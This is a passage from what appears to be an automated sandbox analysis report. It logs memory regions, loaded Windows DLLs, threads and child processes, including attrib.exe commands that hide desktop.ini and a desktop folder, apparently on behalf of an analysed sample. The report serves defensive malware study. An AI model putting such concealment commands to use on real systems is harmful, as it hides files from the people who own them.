"c:\\windows\\system32\\user32.dll") Region: id = 33852 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 33853 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33854 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 33855 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 33856 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33857 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33858 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 33859 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33860 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33964 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33965 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 33966 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 33967 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 33968 start_va = 0x300000 end_va = 0x37ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 33969 start_va = 0x3b0000 end_va = 0x4b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 33970 start_va = 0x560000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 33971 start_va = 0x650000 end_va = 0x68ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 33972 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 33973 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 33974 start_va = 0x380000 end_va = 0x380fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 33975 start_va = 0x780000 end_va = 0x7bffff entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 33976 start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 33977 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 33978 start_va = 0x390000 end_va = 0x390fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 33979 start_va = 0x6ebe0000 end_va = 0x6ebe9fff entry_point = 0x6ebe0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 33980 start_va = 0x6e0000 end_va = 0x71ffff entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 33981 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 33982 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 33983 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 33984 start_va = 0x850000 end_va = 0xb1efff entry_point = 0x850000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 33985 start_va = 0x75370000 end_va = 0x7537dfff entry_point = 0x75370000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 33986 start_va = 0x5f0000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 33987 start_va = 0xb80000 end_va = 0xbbffff entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 33988 start_va = 0x6ef00000 end_va = 0x6ef0efff entry_point = 0x6ef00000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 33989 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 33990 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 33991 start_va = 0x6ebf0000 end_va = 0x6ec07fff entry_point = 0x6ebf0000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 33992 start_va = 0x6ec10000 end_va = 0x6eca5fff entry_point = 0x6ec10000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 34023 start_va = 0x75820000 end_va = 0x75824fff entry_point = 0x75820000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Thread: id = 820 os_tid = 0xe8c Thread: id = 822 os_tid = 0x240 Thread: id = 823 os_tid = 0x24c Thread: id = 824 os_tid = 0x37c Thread: id = 825 os_tid = 0xfb4 Thread: id = 826 os_tid = 0x720 Thread: id = 944 os_tid = 0xed0 Process: id = "597" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16d40" os_pid = "0xdb4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "595" os_parent_pid = "0xc84" cmd_line = "attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 33934 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 33935 start_va = 0x30000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 33936 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 33937 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 33938 start_va = 0x530000 end_va = 0x536fff entry_point = 0x530000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 33939 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 33940 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 33941 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 33942 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 33943 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33944 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33945 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33946 start_va = 0x90000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 33947 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 33948 start_va = 0x1a0000 end_va = 0x206fff entry_point = 0x1a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33949 start_va = 0x71df0000 end_va = 0x71e0cfff entry_point = 0x71df0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 33950 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33951 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 33952 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33953 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33954 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 33955 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33956 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33957 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33958 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 33959 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33960 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33961 start_va = 0x210000 end_va = 0x2d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 33962 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33963 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 821 os_tid = 0xbf4 Process: id = "598" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16e80" os_pid = "0x8e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "595" os_parent_pid = "0xc84" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 33993 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 33994 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 33995 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 33996 start_va = 0x110000 end_va = 0x116fff entry_point = 0x110000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 33997 start_va = 0x210000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 33998 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 33999 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34000 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34001 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 34002 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34003 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34004 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34005 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34006 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 34007 start_va = 0x570000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 34008 start_va = 0x71e30000 end_va = 0x71e4cfff entry_point = 0x71e30000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 34009 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34010 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 34011 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34012 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34013 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 34014 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34015 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34016 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34017 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 34018 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34019 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34020 start_va = 0x120000 end_va = 0x1e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 34021 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34022 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 828 os_tid = 0xd68 Process: id = "599" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16e80" os_pid = "0xd88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "595" os_parent_pid = "0xc84" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34024 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34025 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34026 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34027 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 34028 start_va = 0x6e0000 end_va = 0x6e6fff entry_point = 0x6e0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 34029 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34030 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34031 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34032 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 34033 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34034 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34035 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34036 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34037 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 34038 start_va = 0x490000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 34039 start_va = 0x71df0000 end_va = 0x71e0cfff entry_point = 0x71df0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 34040 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34041 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 34042 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34043 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34044 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 34045 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34046 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34047 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34048 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 34049 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34050 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34051 start_va = 0x160000 end_va = 0x227fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 34052 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34053 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 830 os_tid = 0x4d4 Process: id = "600" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x7ea16820" os_pid = "0xfa0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "298" os_parent_pid = "0x358" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000b277" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 34056 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34057 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34058 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34059 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 34060 start_va = 0xf50000 end_va = 